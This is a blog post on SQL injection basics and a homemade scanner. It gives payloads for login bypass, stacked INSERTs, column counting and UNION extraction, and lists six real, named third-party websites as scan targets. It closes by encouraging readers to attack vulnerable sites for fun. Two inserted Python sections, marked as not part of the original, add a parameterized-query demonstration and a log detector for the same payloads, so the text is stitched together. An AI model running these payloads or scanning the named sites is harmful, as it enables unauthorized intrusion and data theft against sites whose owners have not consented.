Vlad

SISI: SQL Injection Scanner and Injector for Web Applications

Updated: Mar 6, 2018

What is up readers! This post is about setting up a test for websites that could be vulnerable to one of the most well-known attacks, one that can completely take down your website.



The legendary SQL injection...

Today I'm going to demonstrate some SQL injection basics and why it has been one of the most destructive attacks. I'm also gonna show you my tool and how I use it to scan and test a URL/site that could be vulnerable to such an attack.


SQL injection has been one of the most common web attacks known for decades. It is the attackers' bread and butter for taking down a web application's database. It takes down your application, it can take down your business, it can take down your life! It is the deadliest injection ever known. As the name says, it is injecting SQL statements into input fields so that they are executed by the underlying SQL database.


According to a recent Mozilla survey of the top one million websites analyzed, 93.45 percent earned an "F" for failure to implement basic security measures that would protect them from attacks like cross-site scripting, Layer 7 DoS and SQL injection. One known cause for this is poor security hygiene in the form of insecure coding. I myself have developed an app, and developing an application with secure code is a must and every developer's responsibility. Yes, it may take away some of the 'bling' your application may have, but you have to choose: a more secure app, or an app that is poorly coded and insecure!


The Basics


One of my goals today is to refresh or introduce you to some SQL injection basics that a typical attacker executes to exploit a web application. So today I'm going to show attacks you can execute and try yourself.


%27%20or1=1--'


Suppose we have the query,


SELECT password FROM user_db WHERE name = 'admin' OR 1=1 -- '


The query selects the password from table user_db where the username is admin. Because we also OR in the condition 1=1, which is always true, every password in the table is returned. Additionally, -- comments out the rest of the query, including the original closing quote.


Thus the injected URL looks like,

http://www.url.com/user.php?user = john OR 1=1 --'


; INSERT INTO users

Let's say we have the query

SELECT * FROM cms_users WHERE user_id = $user_id


The perfect way to exploit this is by


http://www.url.com/user.php?id = 23; INSERT INTO table1 (...)


which is equivalent to,


SELECT * FROM cms_users WHERE user_id = $user_id ; INSERT INTO table1


This way we can execute a lot of queries in a row, independent of the first query.


AND 1=2

With the following SQL query:


SELECT * FROM users WHERE user_id=$user_id


The above corresponds to the HTTP query

https://www.url.com/user.php?id=12


So when the pentester plays with some logic, AND or OR, this becomes

SELECT * FROM users WHERE user_id=12 AND 1=2


If any SQL error is fired, it might indicate that no user with that id has been found in the database. Then we can test a TRUE statement: https://www.url.com/user.php?id=12 AND 1=1




'or '1' = '1')) LIMIT 1/*&password=foo

We have the SQL query,

SELECT * FROM Users WHERE Username='$username' AND Password='$password'


If the query returns a row, it means the user supplied the exact credentials; otherwise access is denied. So when we insert the following values in the given fields,


$Username = 1' or '1' = '1


and


$password = 1' or '1' = '1


We then have,

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'


With this query we get a result without knowing the username or the password.
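To make the login-bypass and the "; INSERT INTO" stacked-query sections above concrete from the defender's side, here is an added example that is not part of the original post or of the SISI tool. It builds a throwaway SQLite table with constructed sample rows, runs the post's `1' or '1' = '1` payload against a string-concatenated query and against a parameterized one, and checks whether a chained second statement even reaches the database through Python's sqlite3 driver. The function and table names are my own.

```python
import sqlite3


def make_db():
    """Constructed in-memory Users table; the two rows are sample data, not from the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret"), ("john", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL text,
    exactly like the $username / $password query shown in the post."""
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Placeholders: the driver passes the input as data, never as SQL,
    so a quote or OR inside it cannot change the WHERE clause."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchall()


def stacked_query_allowed(conn, user_id):
    """Return True if the (still concatenated) query executed.

    Python's sqlite3 refuses more than one statement per execute(), so a
    value such as "1; INSERT INTO ..." is rejected at the API layer here.
    Other drivers and databases may run the second statement; whether they
    do is an assumption to verify for your own stack, not a defence."""
    sql = "SELECT * FROM Users WHERE rowid=" + user_id
    try:
        conn.execute(sql).fetchall()
        return True
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # older Python versions raised sqlite3.Warning for the same condition
        return False


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or '1' = '1"   # the post's login-bypass payload
    print("concatenated :", len(login_vulnerable(db, tautology, tautology)), "row(s)")
    print("parameterized:", len(login_parameterized(db, tautology, tautology)), "row(s)")
    print("stacked query executed:",
          stacked_query_allowed(db, "1; INSERT INTO Users VALUES ('x','y')"))
```

Running it shows the concatenated query returning every row for the tautology while the parameterized query returns none, and sqlite3 refusing the chained INSERT. The fix that matters is the placeholder query; the driver's one-statement rule only changes which of the post's payloads reach the database.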



ORDER BY n-- (where n is a certain number)


This query is perfect for finding out how many columns are present in a particular table. If there is an output value, then there are n or more columns in the selected table. If the query fails, then there are fewer than n.


SELECT * FROM users WHERE user_id=12


Injected,


https://url.com/user = 12; ORDER by 5--


This is equivalent to the new query below,


SELECT * FROM users WHERE user_id=12; ORDER by 5--




UNION SELECT 1,1,null--

UNION-based attacks allow the tester to easily extract information from the database. Because the UNION operator can only be used if both queries have exactly the same structure (the same number of columns), the attacker must craft a SELECT statement similar to the original query.


So let's say we have

SELECT name, description, price FROM products WHERE category=1 UNION SELECT 1 FROM all_tables


So the attack would be,


http://url.com/category=1 UNION SELECT 1,1,null--



Automation


I have gathered some websites vulnerable to injection; the list goes below.


http://vacationet.com/resort.php?id=22

http://jokusoftware.cz/file.php?id=icqj3

http://www.uselitewine.com/index.php?id=16

http://www.ellafitzgerald.com/viewheadline.php?id=34187

http://mathman.dreamhosters.com/MathMan/Organization.php?id=78

http://www.sherylblais.com/index.php?id=512


The idea is to scan these sites with my tool to check whether they are vulnerable to SQL injection. If a site can't be reached (404), the tool outputs [errno socket error]; otherwise it reports whether the site is vulnerable to the exploit or not.


The injection attacks mentioned above are what we are going to use. Let's preview them, shall we,


%27%20or1=1--

; INSERT INTO users

AND%201=2

ORDER BY 10--

'

UNION SELECT 1,1,null--

+OR+0x50=0x50


Now that we have the list of sites and the attacks, it's time to concatenate URL + attack. We'll be doing it via HTTP requests..
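The payload list above is also a detection list. The following added example is mine, not the post's or the SISI tool's: it URL-decodes the query string of each request in a few constructed access-log lines and tags the ones carrying the shapes listed above, tautologies like `or1=1` and `0x50=0x50`, `AND 1=2` boolean probes, `; INSERT` stacked statements, `ORDER BY n--` column probes, `UNION SELECT` and trailing comment markers. The signature labels and the log lines are my own, and the IP address in them is a documentation address.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# (label, pattern) pairs written against the decoded query string.
# Each models one payload shape from the list in the post.
SIGNATURES = [
    # OR 1=1, or1=1, '1' = '1, OR 0x50=0x50 : the same token on both sides of '='
    ("tautology",      re.compile(r"\b(?:or|and)\s*['\"]?\s*(\w+)\s*=\s*['\"]?\1\b", re.I)),
    # AND 1=2 : numeric comparison used for blind true/false probing
    ("boolean_probe",  re.compile(r"\b(?:and|or)\s*\d+\s*=\s*\d+\b", re.I)),
    # ; INSERT INTO ... : a second statement chained after the first
    ("stacked_query",  re.compile(r";\s*(?:insert|update|delete|drop|create|alter)\b", re.I)),
    # ORDER BY n-- : counting columns
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    # UNION SELECT ... : appending rows from another query
    ("union_select",   re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # trailing -- or /* : cutting off the rest of the original statement
    ("comment_tail",   re.compile(r"--\s*$|/\*")),
    # a lone quote at the end of the value: the "does it error?" probe
    ("stray_quote",    re.compile(r"'\s*$")),
]

# Matches the request target in a Combined Log Format line.
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_query(url):
    """Decode the query string the way the application would see it (%xx and '+')."""
    return unquote_plus(urlsplit(url).query)


def classify(url):
    """Return the sorted list of signature labels that match the decoded query."""
    query = decode_query(url)
    return sorted(label for label, rx in SIGNATURES if rx.search(query))


def scan_log(text):
    """Return [(request_target, labels)] for every log line that matches a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        labels = classify(m.group(1))
        if labels:
            hits.append((m.group(1), labels))
    return hits


# Constructed sample access-log lines (not real traffic), one per payload in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Mar/2018:10:00:01 +0000] "GET /user.php?id=12 HTTP/1.1" 200 512
203.0.113.7 - - [06/Mar/2018:10:00:02 +0000] "GET /user.php?id=12%27%20or1=1-- HTTP/1.1" 200 9812
203.0.113.7 - - [06/Mar/2018:10:00:03 +0000] "GET /user.php?id=12;%20INSERT%20INTO%20users HTTP/1.1" 500 210
203.0.113.7 - - [06/Mar/2018:10:00:04 +0000] "GET /user.php?id=12%20AND%201=2 HTTP/1.1" 200 0
203.0.113.7 - - [06/Mar/2018:10:00:05 +0000] "GET /user.php?id=12%20ORDER%20BY%2010-- HTTP/1.1" 500 210
203.0.113.7 - - [06/Mar/2018:10:00:06 +0000] "GET /user.php?id=12%20UNION%20SELECT%201,1,null-- HTTP/1.1" 200 9812
203.0.113.7 - - [06/Mar/2018:10:00:07 +0000] "GET /user.php?id=12+OR+0x50=0x50 HTTP/1.1" 200 9812
"""

if __name__ == "__main__":
    for target, labels in scan_log(SAMPLE_LOG):
        print(target, "->", ", ".join(labels))
```

Only the benign first line passes; the other six are tagged with the shape they carry. The scanner decodes one layer of encoding and matches plain text, so double-encoding or inline-comment obfuscation would slip past it; use it for triage when reviewing logs after the fact, not as a blocking filter.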


RUN








A simple program can manipulate the web server's database and wreak havoc on an organization. SQL injection is old, but it will never go away. You can try it out yourself and have some fun: given a vulnerable site, try the SQL injection attack and craft your own too.


krontek>halt
